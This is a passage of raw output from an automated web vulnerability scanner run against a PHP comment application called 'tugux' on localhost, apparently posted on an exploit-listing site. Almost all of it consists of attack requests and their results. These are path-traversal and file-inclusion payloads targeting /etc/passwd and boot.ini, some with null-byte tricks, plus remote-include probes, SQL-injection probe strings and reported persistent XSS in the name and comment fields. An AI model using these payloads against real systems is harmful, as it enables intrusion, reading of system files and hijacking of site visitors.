  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=%BF%27%22%28&email=on&name=on&submit1=Submit&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%BF%27%22%28
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=on&name=%BF%27%22%28&submit1=Submit&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=on&name=on&submit1=%BF%27%22%28&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=%BF%27%22%28&name=on&submit1=Submit&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=http%3A%2F%2Fwww.google.com%2F&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=http%3A%2F%2Fwww.google.com%2F
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=http%3A%2F%2Fwww.google.com%2F&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=http%3A%2F%2Fwww.google.com%2F&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=http%3A%2F%2Fwww.google.com%2F&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=c%3A%5C%5Cboot.ini&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=c%3A%5C%5Cboot.ini&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=c%3A%5C%5Cboot.ini%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=c%3A%5C%5Cboot.ini%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=%BF%27%22%28&email=on&name=on&submit1=Submit&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%BF%27%22%28
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=on&name=%BF%27%22%28&submit1=Submit&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=on&name=on&submit1=%BF%27%22%28&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=%BF%27%22%28&name=on&submit1=Submit&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
Found permanent XSS in http://localhost/tugux/latest.php?nid=
  attacked by http://localhost/tugux/latest.php?nid= with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid=
  attacked by http://localhost/tugux/latest.php?nid= with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid= 10
  attacked by http://localhost/tugux/latest.php?nid= with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid= 10
  attacked by http://localhost/tugux/latest.php?nid= with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid= 9
  attacked by http://localhost/tugux/latest.php?nid= with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid= 9
  attacked by http://localhost/tugux/latest.php?nid= with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid=10
  attacked by http://localhost/tugux/latest.php?nid=10 with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid=10
  attacked by http://localhost/tugux/latest.php?nid=10 with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid=9
  attacked by http://localhost/tugux/latest.php?nid=9 with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid=9
  attacked by http://localhost/tugux/latest.php?nid=9 with field name

Navigation

Suggest Exploit

Services By CQR